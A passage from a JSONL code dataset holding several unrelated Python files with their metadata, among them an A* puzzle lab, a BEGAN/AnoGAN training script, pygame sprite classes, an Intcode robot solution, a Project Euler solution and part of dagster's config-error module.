8, 3,\n 1, 6, 4,\n 7, 0, 5],\n\n [2, 8, 1,\n 4, 6, 3,\n 0, 7, 5]]\n#Iterate over number of initial_state\nfor i in range(0,3):\n #TODO: Initialize the num_of_instances to zero\n Puzzle.num_of_instances = 0\n #Set t0 to current time\n t0 = time()\n astar = Astar_search(state[i])\n #Get the time t1 after executing the Astar_search method\n t1 = time() - t0\n print('A*:',astar)\n print('space:', Puzzle.num_of_instances)\n print('time:', t1)\n print()\n print('------------------------------------------')\n","sub_path":"AstarLab1.py","file_name":"AstarLab1.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"507192982","text":"\"\"\"Test `AnoGAN` Interactively.\n\"\"\"\n\n# %% Pre-load ----------------------------------------------------------------\n\nimport tensorflow as tf\nimport os\nimport shutil\nprint(os.getcwd())\nif os.getcwd().split('/')[-1] != 'dcgan':\n os.chdir('../git/dcgan')\n\n# !python download.py celebA\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread_collection, imsave\nfrom skimage.transform import resize\nfrom sklearn.model_selection import train_test_split\n\n# %% Data Preprocessing 
------------------------------------------------------\n\n# from glob import glob\n# import shutil\n#\n# # sample_list = [\n# # 1000,\n# # 3000,\n# # 5000,\n# # 10000,\n# # 50000,\n# # 100000,\n# # ]\n# #\n# # origin_list = glob('./data/celebA/*.jpg')\n# # for _ in sample_list:\n# # alist = origin_list[:_]\n# #\n# # newdir_name = './data/celebA_%s' % _\n# # if os.path.isdir(newdir_name):\n# # shutil.rmtree(newdir_name)\n# # os.makedirs(newdir_name, exist_ok=True)\n# # [shutil.copy2(file, './data/celebA_%s/' % _) for file in alist]\n#\n#\n# origin_path = './data/celebA'\n# origin_list = glob(origin_path + '/*.jpg')\n# origin_data = imread_collection(\n# load_pattern=origin_list,\n# )\n#\n# def center_crop(image, size=(128, 128)):\n# xcrop, ycrop = size\n# ysize, xsize, chan = image.shape\n# xoff = (xsize - xcrop) // 2\n# yoff = (ysize - ycrop) // 2\n# cropped = image[yoff:-yoff,xoff:-xoff]\n# return cropped\n#\n# cropped = map(lambda img: center_crop(img, size=(64, 64)), origin_data)\n#\n# resized = np.array(\n# list(map(lambda img: resize(\n# img,\n# (64, 64),\n# preserve_range=False,\n# anti_aliasing=True,\n# mode='reflect',\n# ),\n# cropped\n# )\n# ),\n# dtype=np.float32,\n# )\n#\n#\n# sample_list = [\n# 1000,\n# 3000,\n# 5000,\n# 10000,\n# 50000,\n# 100000,\n# ]\n#\n# for _ in sample_list:\n# alist = resized[:_]\n#\n# newdir_name = './data/celebA_cropped_%s' % _\n# if os.path.isdir(newdir_name):\n# shutil.rmtree(newdir_name)\n# os.makedirs(newdir_name, exist_ok=True)\n# [imsave(\n# newdir_name + '/cropped_%s.png' % str(i).zfill(len(str(_))),\n# img,\n# ) for i, img in enumerate(alist)]\n\n# %% -------------------------------------------------------------------------\n\n# %%\n# data_x = imread_collection(\n# #load_pattern='./data/celebA/*.jpg',\n# #load_pattern='./data/celebA_1000/*.jpg',\n# #load_pattern='./data/celebA_3000/*.jpg',\n# #load_pattern='./data/celebA_5000/*.jpg',\n# #load_pattern='./data/celebA_10000/*.jpg',\n# #load_pattern='./data/celebA_50000/*.jpg',\n# #load_pattern='./data/celebA_100000/*.jpg',\n# load_pattern='./data/celebA_cropped_100000/*.png',\n# )\n# data_x = (np.array(data_x) - .5) * 2.\n#\n# plt.imshow(data_x[0])\n# print('`data_x` is ready:', data_x.shape, data_x.dtype)\n#\n#\n# data_x[0].shape\n# data_x[0].mean(axis=0).astype(np.float32)\n# data_x[0].min(axis=0).astype(np.float32)\n# data_x[0].max(axis=0).astype(np.float32)\n# data_x[0].std(axis=0).astype(np.float32)\n\n\nfrom glob import glob\n\n\n#data_x_filenames = glob('/Users/soheehwang/Downloads/DCGAN-tensorflow-master/samples/*.png')\n# data_x = glob('./data/celebA/*.jpg')\ndata_x = glob('./data/data_crop_256_jpg/*.jpg')\n# plt.imshow(data_x[0])\nprint('`data_x` is ready:', len(data_x))\n\n\n# data_z = np.random.normal(\n# loc=0.,\n# scale=1.,\n# size=(len(data_x), 100),\n# )\ndata_z = np.random.uniform(\n low=0.,\n high=1.,\n size=(len(data_x), 64),\n).astype(np.float32)\n\nprint('`data_z` is ready:', data_z.shape, data_z.dtype)\n\ndata_onevector = np.ones_like(data_z)\n\n(train_x, test_x,\n train_z, test_z,\n train_onevector, test_onevector) = train_test_split(\n data_x,\n data_z,\n data_onevector,\n test_size=.2,\n)\n\n\n# %% AnoGAN: Build -----------------------------------------------------------\n\nimport importlib\nfrom src.began import began as BeGAN\nimportlib.reload(BeGAN)\nBEGAN = BeGAN.BEGAN\n\ntf.reset_default_graph()\nbegan = BEGAN(\n input_x_ext='jpg',\n input_x_dtype=tf.float32,\n input_z_dtype=tf.float32,\n input_x_shape=(None, 256, 256, 3),\n input_z_shape=(None, 64),\n use_gpu=True,\n 
#input_width=64,\n #input_height=64,\n #input_channel=3,\n # output_width=None,\n # output_height=None,\n # output_channel=None,\n # class_num=1,\n filter_dim=64, # 128\n # g_filter_dim=64,\n # d_filter_dim=64,\n g_fc_dim=1024,\n d_fc_dim=1024,\n batch_size=64,\n batch_norm_ok=False,\n conv_activation=tf.nn.elu,\n dropout=None,\n lr_decaying=True,\n decay_lr_step=100_000,\n buffer_size=1000,\n learning_rate=0.0005,\n adam_beta1=.5,\n adam_beta2=.9,\n validation_ratio=.2,\n ano_lambda_=.1,\n)\n\n# %% AnoGAN: Train DCGAN -----------------------------------------------------\n\nshutil.rmtree('./model_save/began_origin', ignore_errors=True)\n\n# %%\n\nbegan.train_BEGAN(\n #input_x=train_x,\n input_x_filenames=train_x,\n input_z=train_z,\n batch_size=16,\n epoch_num=5,\n validation_ratio=.05,\n learning_rate=.0001,\n lambda_val=.001,\n gamma_val=.7,\n model_save_dir='./model_save/began_origin',\n #pre_trained_path='./model_save/began_origin',\n pre_trained_path=None,\n verbose=True,\n #writer=None,\n)\n\n\n# %% AnoGAN: Train DCGAN -----------------------------------------------------\n\nbegan.train_BEGAN(\n #input_x=train_x,\n input_x_filenames=train_x,\n input_z=train_z,\n batch_size=32,\n epoch_num=50,\n validation_ratio=.05,\n learning_rate=.0003,\n lambda_val=.001,\n gamma_val=.7,\n model_save_dir='./model_save/began_origin',\n pre_trained_path='./model_save/began_origin',\n #pre_trained_path=None,\n verbose=True,\n #writer=None,\n)\n\n\n# %% AnoGAN: Evaluate DCGAN --------------------------------------------------\n\ngen_x = began.evaluate_BEGAN(\n input_z=test_z[:1],\n pre_trained_path='model_save_dcgan_origin',\n target_epoch=5,\n)\ntest_z[0]\ngen_x.shape\ngen_x[0].min()\ngen_x[0].max()\nimg = gen_x[0]\nimg\n\npred_img = (img + 1.) / 2. * 255\nplt.imshow(gen_x[0])\ntype(gen_x)\n\ngen_x\n\n\n# %% AnoGAN: Train AnoGAN ----------------------------------------------------\n\nbegan.train_BEGAN(\n input_x=train_x,\n input_z=train_onevector,\n epoch_num=1,\n model_save_dir='./model_save_anogan_origin',\n pre_trained_path=None,\n verbose=True,\n writer=None,\n)\n\n\n# %% AnoGAN: Evaluate AnoGAN -------------------------------------------------\n\ngen_x = began.evaluate_BEGAN(\n input_z=test_z[:1],\n pre_trained_path='model_save_dcgan_origin',\n target_epoch=5,\n)\n\n# %% Test Code: tf.data.Dataset ----------------------------------------------\n\nif __name__ == '__main__':\n tf.reset_default_graph()\n X_t = tf.placeholder(tf.int16, (None, 2),\n name='x_tensor_interface')\n Z_t = tf.placeholder(tf.int16, (None, 1),\n name='z_tensor_interface')\n\n dataset = tf.data.Dataset.from_tensor_slices((X_t, Z_t))\n dataset = dataset.shuffle(buffer_size=1000) # reshuffle_each_iteration=True as default.\n dataset = dataset.batch(2)\n dataset = dataset.flat_map(\n lambda data_x, data_z: tf.data.Dataset.zip(\n (\n tf.data.Dataset.from_tensors(data_x),\n tf.data.Dataset.from_tensors(data_z),\n )\n ).repeat(3)\n )\n\n\n data_op = dataset.make_initializable_iterator()\n data_init_op = data_op.initializer\n X_batch, Z_batch = data_op.get_next()\n\n bias_x0 = tf.convert_to_tensor(np.array([1, 2]), dtype=tf.int16)\n bias_z0 = tf.convert_to_tensor(np.array([7]), dtype=tf.int16)\n\n bias_x1 = tf.convert_to_tensor(np.array([10, 11]), dtype=tf.int16)\n bias_z1 = tf.convert_to_tensor(np.array([50]), dtype=tf.int16)\n add1 = tf.nn.bias_add(X_batch, bias_x0)\n add2 = tf.nn.bias_add(Z_batch, bias_z0)\n add3 = tf.nn.bias_add(X_batch, bias_x1)\n add4 = tf.nn.bias_add(Z_batch, bias_z1)\n\n a = np.array([\n [100, 100],\n [200, 
200],\n [300, 300],\n [400, 400],\n [500, 500],\n ])\n\n b = np.array([\n [600],\n [700],\n [800],\n [900],\n [600],\n ])\n\n with tf.Session() as sess:\n init_op = tf.global_variables_initializer()\n init_op.run()\n\n for epoch in range(10):\n print('[EPOCH]', epoch+1, '======================')\n sess.run(data_init_op, feed_dict={X_t: a, Z_t: b})\n batch_remains_ok = True\n batch_num = 0\n while batch_remains_ok and (batch_num+1 < 3):\n try:\n for batch_num in range(3): # batch_size=2, num=3\n print('[BATCH]', batch_num+1, '--------------')\n res1 = sess.run(add1)\n # res2 = sess.run(add2)\n # res3, res4 = sess.run([add3, add4])\n res5 = sess.run(add1)\n # res6 = sess.run(add2)\n\n print('res1', res1, '\\n')\n # print(res2)\n # print(res3, '\\n')\n print('res5', res5, '\\n')\n # print(res6, '\\n')\n\n except tf.errors.OutOfRangeError:\n batch_remains_ok = False\n continue\n\n\n\nif __name__ == '__main__':\n tf.reset_default_graph()\n X_t = tf.placeholder(tf.int16, (None, 2),\n name='x_tensor_interface')\n Z_t = tf.placeholder(tf.int16, (None, 1),\n name='z_tensor_interface')\n\n dataset = tf.data.Dataset.from_tensor_slices((X_t, Z_t))\n dataset = dataset.shuffle(buffer_size=1000) # reshuffle_each_iteration=True as default.\n dataset = dataset.batch(2)\n dataset = dataset.flat_map(\n lambda data_x, data_z: tf.data.Dataset.zip(\n (\n tf.data.Dataset.from_tensors(data_x),\n tf.data.Dataset.from_tensors(data_z),\n )\n ).repeat(12)\n )\n\n\n data_op = dataset.make_initializable_iterator()\n data_init_op = data_op.initializer\n X_batch, Z_batch = data_op.get_next()\n\n bias_x0 = tf.convert_to_tensor(np.array([1, 2]), dtype=tf.int16)\n bias_z0 = tf.convert_to_tensor(np.array([7]), dtype=tf.int16)\n\n bias_x1 = tf.convert_to_tensor(np.array([10, 11]), dtype=tf.int16)\n bias_z1 = tf.convert_to_tensor(np.array([50]), dtype=tf.int16)\n add1 = tf.nn.bias_add(X_batch, bias_x0)\n add2 = tf.nn.bias_add(Z_batch, bias_z0)\n add3 = tf.nn.bias_add(X_batch, bias_x1)\n add4 = tf.nn.bias_add(Z_batch, bias_z1)\n\n a = np.array([\n [100, 100],\n [200, 200],\n [300, 300],\n [400, 400],\n [500, 500],\n ])\n\n b = np.array([\n [600],\n [700],\n [800],\n [900],\n [600],\n ])\n\n with tf.Session() as sess:\n init_op = tf.global_variables_initializer()\n init_op.run()\n\n for epoch in range(10):\n print('[EPOCH]', epoch+1, '======================')\n xx, zz = sess.run(data_init_op, feed_dict={X_t: a, Z_t: b})\n\n print(xx)\n print(zz)\n\n\n# %% Test Code: tf.train.Saver load ------------------------------------------\n\nif __name__ == '__main__':\n\n tf.reset_default_graph()\n with tf.Session() as sess:\n model = tf.train.import_meta_graph('model_save_dcgan_origin/last_weights/after-epoch-2.meta')\n saved_var = 'model_save_dcgan_origin/last_weights/after-epoch-2'\n model.restore(sess, saved_var)\n\n# %% Test Code: reduce_mean --------------------------------------------------\n\nimport tensorflow as tf\nimport numpy as np\n\nif __name__ == '__main__':\n tf.reset_default_graph()\n\n def _layer_linear(\n input_x,\n output_size,\n is_training=True,\n stddev=0.02,\n bias_start=0.,\n dropout=.3,\n return_weight=False,\n reuse=tf.AUTO_REUSE,\n name='linear',\n ):\n\n with tf.variable_scope(name, reuse=reuse):\n\n input_shape = input_x.get_shape().as_list()\n\n weight = tf.get_variable(\n 'weight',\n shape=(input_shape[1], output_size),\n dtype=tf.float32,\n initializer=tf.random_normal_initializer(\n mean=1.,\n stddev=stddev\n ),\n )\n bias = tf.get_variable(\n 'bias',\n shape=(output_size,),\n dtype=tf.float32,\n 
initializer=tf.constant_initializer(bias_start),\n            )\n\n            lineared = tf.nn.bias_add(\n                input_x @ weight,\n                bias,\n                data_format='NHWC',\n                name='linear_function',\n            )\n\n            # (Optional) Dropout Layer\n            # if dropout:\n            #\n            #     keep_prob = tf.cond(\n            #         is_training,\n            #         lambda x: tf.Constant((1. - dropout)),\n            #         lambda x: tf.Constant(1.),\n            #         name='choose_prob_if_training'\n            #     )\n            #     # TBD: tf.layers.dropout()\n            #     lineared = tf.nn.dropout(\n            #         lineared,\n            #         keep_prob=keep_prob,\n            #         name='dropout',\n            #     )\n\n            print(name, lineared.get_shape())\n\n            if return_weight:\n                return lineared, weight, bias\n            else:\n                return lineared\n\n    a = np.arange(10 * 64 * 64 * 3).reshape(-1, 64, 64, 3).astype(np.float32)\n\n    a_tensor = tf.convert_to_tensor(a, dtype=tf.float32)\n    a_ones_tensor = tf.ones_like(a_tensor, dtype=tf.float32)\n    a_ones_subset_tensor = tf.ones_like(a_tensor[:,:], dtype=tf.float32)\n    a_sigmoid_tensor = tf.nn.sigmoid(a_tensor)\n    a_dense_tensor = tf.layers.dense(a_tensor, 1)\n    a_dense_sigmoid_tensor = tf.nn.sigmoid(a_dense_tensor)\n    a_reshape_tensor = tf.reshape(\n        a_tensor,\n        shape=(-1, 64 * 64 * 3),\n    )\n    a_linear_tensor = _layer_linear(\n        a_reshape_tensor,\n        output_size=1,\n        return_weight=False,\n    )\n    a_linear_sigmoid_tensor = tf.nn.sigmoid(a_linear_tensor)\n    a_linear_sigmoid_ones_tensor = tf.ones_like(a_linear_sigmoid_tensor, dtype=tf.float32)\n\n    var_init_op = tf.global_variables_initializer()\n    with tf.Session() as sess:\n\n        print('a', a.shape)\n        print('a_tensor', a_tensor.get_shape())\n        print('a_ones_tensor', a_ones_tensor.get_shape())\n        print('a_ones_subset_tensor', a_ones_subset_tensor.get_shape())\n        print('a_sigmoid_tensor', a_sigmoid_tensor.get_shape())\n        print('a_dense_tensor', a_dense_tensor.get_shape())\n        print('a_dense_sigmoid_tensor', a_dense_sigmoid_tensor.get_shape())\n        print('a_reshape_tensor', a_reshape_tensor.get_shape())\n        print('a_linear_tensor', a_linear_tensor.get_shape())\n        print('a_linear_sigmoid_tensor', a_linear_sigmoid_tensor.get_shape())\n        print('a_linear_sigmoid_ones_tensor', a_linear_sigmoid_ones_tensor.get_shape())\n\n        loss = tf.nn.sigmoid_cross_entropy_with_logits(\n            logits=a_linear_sigmoid_tensor,\n            labels=a_linear_sigmoid_ones_tensor,\n        )\n        loss_mean = tf.reduce_mean(\n            loss\n        )\n        print(loss.get_shape())\n        print(loss_mean.get_shape())\n        sess.run(var_init_op)\n        print(sess.run(loss))\n        print(sess.run(loss_mean))\n","sub_path":"run_began.py","file_name":"run_began.py","file_ext":"py","file_size_in_byte":15518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"248824647","text":"#-*- coding:utf-8 -*\nimport files\n\ndef execute(mob, allEntity) :\n\tif mob[\"AI\"] == \"AItest\" :\n\t\tlog = AItest(mob, allEntity)\n\t\treturn log # in order: mob, all the mobs\n\n\n#######################################\n\"\"\"\nMY AI\n\"\"\"\n########################################\n\n\ndef AItest(mymob, allEntity) :\n\n#we move around in a square\n\tif mymob[\"x\"]>80 :\n\t\tmymob[\"Vx\"] = -1\n\telif mymob[\"x\"]<10 :\n\t\tmymob[\"Vx\"] = 1\n\tif mymob[\"y\"]>38 :\n\t\tmymob[\"Vy\"] = -1\n\telif mymob[\"y\"]<5 :\n\t\tmymob[\"Vy\"] = 1\n\n\tlog = [mymob, allEntity]\n\treturn log\n\n#######################################\n\"\"\"\nMY FUNCTION\n\"\"\"\n######################################\ndef get_player(allEntity) : \n\tfor mob in allEntity[\"mobs\"] :\n\t\tif mob[\"Name\"] == \"Asheiya Briceval\":\n\t\t\treturn mob\n\treturn 
None","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"304344118","text":"# this file should contain base classes for sprites and tiles\n\nimport pygame\nimport math\n\nimport data\n\nclass Object(pygame.sprite.Sprite):\n\n def __init__(self, centerPoint, imageList, activeAI, player):\n self.player = player # keeps track of the player character\n self.imageList = imageList # the current image list\n self.frame = 0 # for cycling through images\n self.frame_speed = 1\n self.image = self.imageList[self.frame/self.frame_speed]\n\n pygame.sprite.Sprite.__init__(self)\n self.rect = self.image.get_rect()\n self.rect.center = centerPoint\n\n self.dead = False # being removed from play?\n self.falling = False # affected by gravity?\n self.facing = 0\t # which way it is moving\n self.xMove,self.yMove = 0,0 # for movement\n self.anim_image = None # for when the object is just\n # a hitbox\n\n self.ai_counter = 0\t # for switching AI states\n self.currentAI = activeAI # the function to be called\n # every refresh dictating behavior\n\n def update(self):\n\n self.currentAI()\n\n def updateImage(self): # cycle through images\n\n self.image = self.imageList[self.frame/self.frame_speed]\n self.frame += 1\n if self.frame >= len(self.imageList) * self.frame_speed:\n self.frame = 0\n\n def switchAI(self, newAI, imageList, frame_speed):\n\n self.anim_image.frame_speed = frame_speed\n self.anim_image.frame = 0\n self.anim_image.imageList = imageList\n self.currentAI = newAI\n self.AI_counter = 0\n\n def basicMovement(self, x_move, y_move, move_screen):\n\n if self.falling:\n self.fall_speed += data.gravity\n if self.fall_speed > data.terminal_velocity:\n self.fall_speed = data.terminal_velocity\n\n self.rect.x += x_move\n if move_screen:\n x,y = self.rect.center\n x += data.bgs_x\n if x < data.screen_padding and x_move < 0:\n data.bgs_x -= x_move\n elif x > data.screen_width - data.screen_padding and x_move > 0:\n data.bgs_x -= x_move\n # handle collisions here!\n\n self.rect.y += y_move\n if move_screen:\n x,y = self.rect.center\n y += data.bgs_y\n if y < data.screen_padding and y_move:\n data.bgs_y -= y_move\n elif y > data.screen_height - data.screen_padding and y_move:\n data.bgs_y -= y_move\n # handle more collisions\n","sub_path":"scripts/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"231522905","text":"import sys\n\nsys.path.append(\"..\")\nfrom utils.utils import IntComputer, Program\n\nmem = list(map(int, open('task_1_input.txt', 'r').readline().split(',')))\n\nx, y = 0, 0\npainted = set()\ncurr_rot = 'u' # u - up, d - down, l - left, r - right\nrot_lkp = {\n 'u': {0: ('l', (-1, 0)), 1: ('r', (1, 0))},\n 'd': {0: ('r', (1, 0)), 1: ('l', (-1, 0))},\n 'l': {0: ('d', (0, 1)), 1: ('u', (0, -1))},\n 'r': {0: ('u', (0, -1)), 1: ('d', (0, 1))},\n}\npanel_map = [['#']]\n\n\nint_comp = IntComputer()\nint_comp.add_program(Program(mem, [1]))\n\n\ndef adjust_painted(painted, x, y):\n adj = set()\n for pos in painted:\n adj.add((pos[0] + x, pos[1] + y))\n\n return adj\n\n\nwhile int_comp.programs[0].status != 0:\n int_comp.run_prog()\n if int_comp.programs[0].outputs:\n color, rot = int_comp.programs[0].outputs\n color = '.' 
if color == 0 else '#'\n\n # clear output\n int_comp.programs[0].reset_output()\n\n # save color info\n painted.add((x, y))\n panel_map[y][x] = color\n\n # adjust panel_map\n lkp = rot_lkp[curr_rot][rot]\n curr_rot = lkp[0]\n x, y = x + lkp[1][0], y + lkp[1][1]\n\n if x < 0:\n for e, row in enumerate(panel_map):\n panel_map[e] = ['.'] + row\n x = 0\n painted = adjust_painted(painted, 1, 0)\n elif x == len(panel_map[0]):\n for e, row in enumerate(panel_map):\n panel_map[e] = panel_map[e] + ['.']\n\n if y < 0:\n panel_map = [['.'] * len(panel_map[0])] + panel_map\n y = 0\n painted = adjust_painted(painted, 0, 1)\n elif y == len(panel_map):\n\n panel_map.append(['.'] * len(panel_map[0]))\n\n inp = 0 if panel_map[y][x] == '.' else 1\n int_comp.programs[0].add_input(inp)\n\n\nfor row in panel_map:\n print(\"\".join(row).replace('.', ' '))\nprint()\n\n","sub_path":"day_11/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"134760463","text":"from setuptools import setup\nimport sys\n\nrequirements = []\n\nif sys.version_info < (3, 4):\n requirements.append('enum34')\n\nconfig = {\n 'name': 'heuris',\n 'description': 'Python client for heuris',\n 'author': 'Alex Young',\n 'author_email': 'alex@heuris.io',\n 'license': 'Apache License, Version 2.0',\n 'url': 'https://github.com/heurisio/heuris-py',\n 'version': '0.5.0',\n 'install_requires': requirements,\n 'packages': ['heuris']\n}\n\nsetup(**config)\n","sub_path":"pypi_install_script/heuris-0.5.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"401756926","text":"# Project Euler - 003\nimport timeit as t\n\n# No need for fancy tricks. 
Simple iterative factorizer does the job.\n# Since 600851475143 is odd, we don't have to check for even factors.\n# Only need to check half of the possible numbers.\n\n# Iterative Solution\ndef max_factor(n):\n factor = 1\n while n != 1:\n factor += 2 # No need to test even factors\n while not n % factor:\n n //= factor\n return factor\n\n# No-args functions for timeit module.\ndef f():\n return max_factor(600851475143)\n\n# A quick query to Wolfram|Alpha confirms the result.\n# \"factor 600851475143\"\n\n# Benchmarks\nprint(\"Timing 1000 runs.\")\nprint(\"Iterative:\", t.timeit(f, number=1000), \"seconds\")\nprint(\"Result:\", f())\n","sub_path":"001 - 100/P003.py","file_name":"P003.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"390989948","text":"import Queue\nfrom collections import deque\n\nimport mint\nfrom mint.core import Entity\nfrom mint.components import NIC\n\nclass Host(Entity):\n\n def __init__(self, name=None):\n super(Host, self).__init__(name=name)\n self.nic = NIC(self)\n self.port = self.nic.port\n\n def send(self, data):\n self.nic.send(data)\n\n def recv(self, n_bits):\n bits = deque()\n while len(bits) < n_bits:\n try:\n bit = self.nic.ibuffer.get(block=False)\n bits.append(bit)\n except Queue.Empty:\n mint.wait(0)\n return ''.join(map(str, bits))\n\nclass Hub(Entity):\n\n def __init__(self, name=None, n_ports=3):\n super(Hub, self).__init__(name=name, n_ports=n_ports)\n\n def run(self):\n while not mint.stopped():\n n = len(self.ports)\n sent_bits = ['0'] * n\n for i, port in enumerate(self.ports):\n bit = port.recv(1)\n if bit == '1':\n for j in range(n):\n if i != j:\n sent_bits[j] = '1'\n for i, port in enumerate(self.ports):\n port.send(sent_bits[i])\n","sub_path":"mint/_versions/20151108145245 fast sender & slow receiver/mint/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"167120990","text":"from collections import namedtuple\nfrom enum import Enum\n\nimport six\n\nfrom dagster import check\n\nfrom dagster.core.errors import DagsterError\nfrom dagster.utils import single_item\n\nfrom .config import ConfigType\nfrom .default_applier import apply_default_values\nfrom .field_utils import check_field_param\nfrom .type_printer import print_config_type_to_string\n\n\nclass DagsterEvaluationErrorReason(Enum):\n RUNTIME_TYPE_MISMATCH = 'RUNTIME_TYPE_MISMATCH'\n MISSING_REQUIRED_FIELD = 'MISSING_REQUIRED_FIELD'\n FIELD_NOT_DEFINED = 'FIELD_NOT_DEFINED'\n SELECTOR_FIELD_ERROR = 'SELECTOR_FIELD_ERROR'\n\n\nclass FieldNotDefinedErrorData(namedtuple('_FieldNotDefinedErrorData', 'field_name')):\n def __new__(cls, field_name):\n return super(FieldNotDefinedErrorData, cls).__new__(\n cls, check.str_param(field_name, 'field_name')\n )\n\n\nclass MissingFieldErrorData(namedtuple('_MissingFieldErrorData', 'field_name field_def')):\n def __new__(cls, field_name, field_def):\n return super(MissingFieldErrorData, cls).__new__(\n cls,\n check.str_param(field_name, 'field_name'),\n check_field_param(field_def, 'field_def'),\n )\n\n\nclass RuntimeMismatchErrorData(namedtuple('_RuntimeMismatchErrorData', 'config_type value_rep')):\n def __new__(cls, config_type, value_rep):\n return super(RuntimeMismatchErrorData, cls).__new__(\n cls,\n check.inst_param(config_type, 'config_type', ConfigType),\n check.str_param(value_rep, 'value_rep'),\n )\n\n\nclass 
SelectorTypeErrorData(namedtuple('_SelectorTypeErrorData', 'dagster_type incoming_fields')):\n def __new__(cls, dagster_type, incoming_fields):\n check.param_invariant(dagster_type.is_selector, 'dagster_type')\n return super(SelectorTypeErrorData, cls).__new__(\n cls, dagster_type, check.list_param(incoming_fields, 'incoming_fields', of_type=str)\n )\n\n\nERROR_DATA_TYPES = (\n FieldNotDefinedErrorData,\n MissingFieldErrorData,\n RuntimeMismatchErrorData,\n SelectorTypeErrorData,\n)\n\n\nclass EvaluationStack(namedtuple('_EvaluationStack', 'config_type entries')):\n def __new__(cls, config_type, entries):\n return super(EvaluationStack, cls).__new__(\n cls,\n check.inst_param(config_type, 'config_type', ConfigType),\n check.list_param(entries, 'entries', of_type=EvaluationStackEntry),\n )\n\n @property\n def levels(self):\n return [\n entry.field_name\n for entry in self.entries\n if isinstance(entry, EvaluationStackPathEntry)\n ]\n\n @property\n def type_in_context(self):\n ttype = self.entries[-1].config_type if self.entries else self.config_type\n # TODO: This is the wrong place for this\n # Should have general facility for unwrapping named types\n if ttype.is_nullable:\n return ttype.inner_type\n else:\n return ttype\n\n\nclass EvaluationStackEntry: # marker interface\n pass\n\n\nclass EvaluationStackPathEntry(\n namedtuple('_EvaluationStackEntry', 'field_name field_def'), EvaluationStackEntry\n):\n def __new__(cls, field_name, field_def):\n return super(EvaluationStackPathEntry, cls).__new__(\n cls,\n check.str_param(field_name, 'field_name'),\n check_field_param(field_def, 'field_def'),\n )\n\n @property\n def config_type(self):\n return self.field_def.config_type\n\n\nclass EvaluationStackListItemEntry(\n namedtuple('_EvaluationStackListItemEntry', 'config_type list_index'), EvaluationStackEntry\n):\n def __new__(cls, config_type, list_index):\n check.int_param(list_index, 'list_index')\n check.param_invariant(list_index >= 0, 'list_index')\n return super(EvaluationStackListItemEntry, cls).__new__(\n cls, check.inst_param(config_type, 'config_type', ConfigType), list_index\n )\n\n\nclass EvaluationError(namedtuple('_EvaluationError', 'stack reason message error_data')):\n def __new__(cls, stack, reason, message, error_data):\n return super(EvaluationError, cls).__new__(\n cls,\n check.inst_param(stack, 'stack', EvaluationStack),\n check.inst_param(reason, 'reason', DagsterEvaluationErrorReason),\n check.str_param(message, 'message'),\n check.inst_param(error_data, 'error_data', ERROR_DATA_TYPES),\n )\n\n\ndef friendly_string_for_error(error):\n type_in_context = error.stack.type_in_context\n\n path_msg, path = _get_friendly_path_info(error.stack)\n\n type_msg = _get_type_msg(error, type_in_context)\n\n if error.reason == DagsterEvaluationErrorReason.MISSING_REQUIRED_FIELD:\n return 'Missing required field \"{field_name}\" {path_msg} Expected: \"{type_msg}\"'.format(\n field_name=error.error_data.field_name,\n path_msg=path_msg,\n type_msg=print_config_type_to_string(type_in_context, with_lines=False),\n )\n elif error.reason == DagsterEvaluationErrorReason.FIELD_NOT_DEFINED:\n return 'Undefined field \"{field_name}\"{type_msg} {path_msg}'.format(\n field_name=error.error_data.field_name, path_msg=path_msg, type_msg=type_msg\n )\n elif error.reason == DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH:\n return 'Type failure at path \"{path}\"{type_msg}. Got \"{value_rep}\". 
{message}.'.format(\n path=path,\n type_msg=type_msg,\n value_rep=error.error_data.value_rep,\n message=error.message,\n )\n elif error.reason == DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR:\n if error.error_data.incoming_fields:\n return (\n 'Specified more than one field at path \"{path}\". '\n 'You can only specify one field at this level.'\n ).format(path=path)\n else:\n return (\n 'You specified no fields at path \"{path}\". '\n 'You must specify one and only one field at this level.'\n ).format(path=path)\n else:\n check.failed('not supported')\n\n\ndef _get_type_msg(error, type_in_context):\n if error.stack.type_in_context.is_system_config:\n return ''\n else:\n return ' on type \"{type_name}\"'.format(type_name=type_in_context.name)\n\n\ndef _get_friendly_path_msg(stack):\n return _get_friendly_path_info(stack)[0]\n\n\ndef _get_friendly_path_info(stack):\n if not stack.entries:\n path = ''\n path_msg = 'at document config root.'\n else:\n comps = ['root']\n for entry in stack.entries:\n if isinstance(entry, EvaluationStackPathEntry):\n comp = ':' + entry.field_name\n comps.append(comp)\n elif isinstance(entry, EvaluationStackListItemEntry):\n comps.append('[{i}]'.format(i=entry.list_index))\n else:\n check.failed('unsupported')\n\n path = ''.join(comps)\n path_msg = 'at path ' + path\n return path_msg, path\n\n\nclass DagsterEvaluateConfigValueError(DagsterError):\n '''Indicates invalid value was passed to a type's evaluate_value method'''\n\n def __init__(self, stack, *args, **kwargs):\n super(DagsterEvaluateConfigValueError, self).__init__(*args, **kwargs)\n self.stack = check.inst_param(stack, 'stack', EvaluationStack)\n\n\nclass EvaluateValueResult(namedtuple('_EvaluateValueResult', 'success value errors')):\n def __new__(cls, success, value, errors):\n return super(EvaluateValueResult, cls).__new__(\n cls,\n check.bool_param(success, 'success'),\n value,\n check.list_param(errors, 'errors', 